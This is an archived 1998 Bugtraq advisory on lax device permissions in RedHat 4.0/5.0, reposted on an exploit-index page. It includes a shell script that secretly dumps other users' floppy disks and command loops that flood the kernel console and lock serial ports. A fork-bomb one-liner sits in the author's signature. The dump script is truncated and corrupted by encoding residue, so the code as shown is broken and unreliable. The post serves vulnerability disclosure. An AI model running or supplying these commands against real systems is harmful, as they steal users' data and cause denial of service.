Poor device permissions on Redhat 4.0/5.0

Description:Lax device perms on RedHat boxes allow unprivileged users to do nasty things such as peeking at the contents of a floppy in your drive or DOS attacks against the system.
Author:Smart List user <slist@cyber.com.au>
Compromise:Local users can read floppy device, be annoying
Vulnerable Systems:RedHat Linux 4.0 and 5.0
Date:4 February 1998

Date: Thu, 5 Feb EDT  03:05:00 +1100 (EST)
From: Smart List user <slist@cyber.com.au>

Received: from brimstone.netspace.org by postbox.anu.edu.au with ESMTP
	( id AA105288284; Thu, 5 Feb 1998 03:04:45 +1100
Received: from unknown@netspace.org (port 32056 []) by brims=
tone.netspace.org with ESMTP id <739-15594>; Wed, 4 Feb 1998 10:54:46 -05=
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c=
) with
          spool id 7421619 for BUGTRAQ@NETSPACE.ORG; Wed, 4 Feb 1998 10:5=
Received: from brimstone.netspace.org (brimstone.netspace.org
          []) by netspace.org (8.8.7/8.8.2) with ESMTP id
          KAA16604 for <BUGTRAQ@NETSPACE.ORG>; Wed, 4 Feb 1998 10:52:30 -=
Received: from unknown@netspace.org (port 32056 []) by
          brimstone.netspace.org with ESMTP id <658-15595>; Wed, 4 Feb 19=
          10:51:04 -0500
Approved-By: aleph1@UNDERGROUND.ORG
Received: from mx1.polbox.com (mx1.polbox.com []) by netspace=
          (8.8.7/8.8.2) with ESMTP id CAA10552 for <BUGTRAQ@NETSPACE.ORG>=
; Wed,
          4 Feb 1998 02:58:43 -0500
Received: from lcamtuf (ppp3-cst162.warszawa.tpnet.pl []) =
          mx1.polbox.com (8.8.5/rev-A0) with SMTP id JAA00118 for
          <BUGTRAQ@NETSPACE.ORG>; Wed, 4 Feb 1998 09:04:08 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=3D"iso-8859-2"
X-Priority: 3
X-Msmail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.71.1712.3
X-Mimeole: Produced By Microsoft MimeOLE V4.71.1712.3
Content-Transfer-Encoding: 8bit
X-Mime-Autoconverted: from quoted-printable to 8bit by netspace.org id CA=
Message-Id: <01bd3149$43e38600$a2fb74c3@lcamtuf>
Date: 	Wed, 4 Feb 1998 09:45:37 +0100

Sender: avalon
From: =3D?UNKNOWN-8BIT?Q?Micha=3DB3?=3D Zalewski <lcamtuf@POLBOX.COM>
Subject:      RedHat 4.x/5.0 /dev permissions
Approved: darrenr@cyber.com.au
X-Originated-From: From: =3D?UNKNOWN-8BIT?Q?Micha=3DB3?=3D Zalewski <lcamtuf@POLBOX.COM>

First one

Any user can read data from (even not mounted) floppy using
"cat /dev/fd0H1440". It isn't dangerous itself, but... Any user
may write a script, which periodically checks if floppy has been
just unmounted, then dumps it's content to a file. Here's a sample
'floppy collector':

-- fdumper --
while :; do
  sleep 1
  if [ "`mount|grep \"^${MOUNT_DEV}\"`" =3D "" ]; then
    if [ "$DUMPED" =3D "0" ]; then
      echo "Dumping image #$LABEL..."
      cat $DUMP_DEV >.fdimage$LABEL
      let LABEL=3DLABEL+1
-- eof --

Also, if there's no floppy in drive, unprivledged user may flood
kernel log console (local console by default!!!):

[user@host sth]$ while :; do cat /dev/fd0H1440;done &

It will generate a lot of kernel messages, which will be logged
to /var/log/messages AND to console (default klogd behaviour). Also,
every printk(...) (called by fd driver) uses sync() to flush buffers.
It will cause abnormal hdd activity.

Second one
(not tested with rh 5.0)

Ordinary user are allowed to read /dev/ttyS*. Serial ports driver
disallows multiple access attempts at the same time, so user may
permanently lock choosen port using this command:

[user@host user]$ cat /dev/ttyS0
[user@host user]$ cat /dev/ttyS0
cat: /dev/ttyS0: device is busy

Now serial port is in unusable state.

That's all?

There are also a lot of other, not-so-common devices, eg. /dev/sequencer,=

which are world-readable or even world-writable.

There's no ANY reason to give ordinary users direct access to hardware
devices. It's quite easy (as shown above ;) to obtain an interesting
data or cause system failure by reading/writing these devices.


ls -l /dev/* | grep "r-- "
chmod ;)

Micha=B3 Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]=

Iterowa=E6 jest rzecz=B1 ludzk=B1, wykonywa=E6 rekursywnie - bosk=B1 [P. =
=3D------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=3D=

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: